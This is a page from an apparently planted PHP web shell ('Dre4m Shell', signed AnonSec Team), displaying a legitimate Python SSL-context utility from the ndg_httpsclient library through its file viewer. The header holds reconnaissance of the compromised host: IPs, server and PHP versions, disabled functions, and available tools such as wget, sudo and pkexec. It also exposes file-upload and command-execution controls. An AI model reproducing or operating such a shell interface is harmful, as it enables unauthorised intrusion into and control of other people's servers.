Dre4m Shell
Server IP : 127.0.0.2  /  Your IP : 3.144.103.205
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/python2.7/dist-packages/ndg/httpsclient/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /usr/lib/python2.7/dist-packages/ndg/httpsclient/ssl_context_util.py
"""ndg_httpsclient SSL Context utilities module containing convenience routines
for setting SSL context configuration.

"""
__author__ = "P J Kershaw (STFC)"
__date__ = "09/12/11"
__copyright__ = "(C) 2012 Science and Technology Facilities Council"
__license__ = "BSD - see LICENSE file in top-level directory"
__contact__ = "Philip.Kershaw@stfc.ac.uk"
__revision__ = '$Id$'
import sys

if sys.version_info[0] > 2:
    import urllib.parse as urlparse_
else:
    import urlparse as urlparse_

from OpenSSL import SSL

from ndg.httpsclient.ssl_peer_verification import ServerSSLCertVerification


class SSlContextConfig(object):
    """
    Holds configuration options for creating a SSL context. This is used as a
    template to create the contexts with specific verification callbacks.
    """
    def __init__(self, key_file=None, cert_file=None, pem_file=None, ca_dir=None,
                 verify_peer=False):
        self.key_file = key_file
        self.cert_file = cert_file
        self.pem_file = pem_file
        self.ca_dir = ca_dir
        self.verify_peer = verify_peer


def make_ssl_context_from_config(ssl_config=False, url=None):
    return make_ssl_context(ssl_config.key_file, ssl_config.cert_file,
                            ssl_config.pem_file, ssl_config.ca_dir,
                            ssl_config.verify_peer, url)


def make_ssl_context(key_file=None, cert_file=None, pem_file=None, ca_dir=None,
                     verify_peer=False, url=None, method=SSL.TLSv1_METHOD,
                     key_file_passphrase=None):
    """
    Creates SSL context containing certificate and key file locations.
    """
    ssl_context = SSL.Context(method)
    
    # Key file defaults to certificate file if present.
    if cert_file:
        ssl_context.use_certificate_file(cert_file)
        
    if key_file_passphrase:
        passwd_cb = lambda max_passphrase_len, set_prompt, userdata: \
                           key_file_passphrase 
        ssl_context.set_passwd_cb(passwd_cb)
        
    if key_file:
        ssl_context.use_privatekey_file(key_file)
    elif cert_file:
        ssl_context.use_privatekey_file(cert_file)

    if pem_file or ca_dir:
        ssl_context.load_verify_locations(pem_file, ca_dir)

    def _callback(conn, x509, errnum, errdepth, preverify_ok):
        """Default certification verification callback.
        Performs no checks and returns the status passed in.
        """
        return preverify_ok
    
    verify_callback = _callback

    if verify_peer:
        ssl_context.set_verify_depth(9)
        if url:
            set_peer_verification_for_url_hostname(ssl_context, url)
        else:
            ssl_context.set_verify(SSL.VERIFY_PEER, verify_callback)
    else:
        ssl_context.set_verify(SSL.VERIFY_NONE, verify_callback)
        
    return ssl_context


def set_peer_verification_for_url_hostname(ssl_context, url, 
                                           if_verify_enabled=False):
    '''Convenience routine to set peer verification callback based on
    ServerSSLCertVerification class'''
    if not if_verify_enabled or (ssl_context.get_verify_mode() & SSL.VERIFY_PEER):
        urlObj = urlparse_.urlparse(url)
        hostname = urlObj.hostname
        server_ssl_cert_verif = ServerSSLCertVerification(hostname=hostname)
        verify_callback_ = server_ssl_cert_verif.get_verify_server_cert_func()
        ssl_context.set_verify(SSL.VERIFY_PEER, verify_callback_)

Anon7 - 2022
AnonSec Team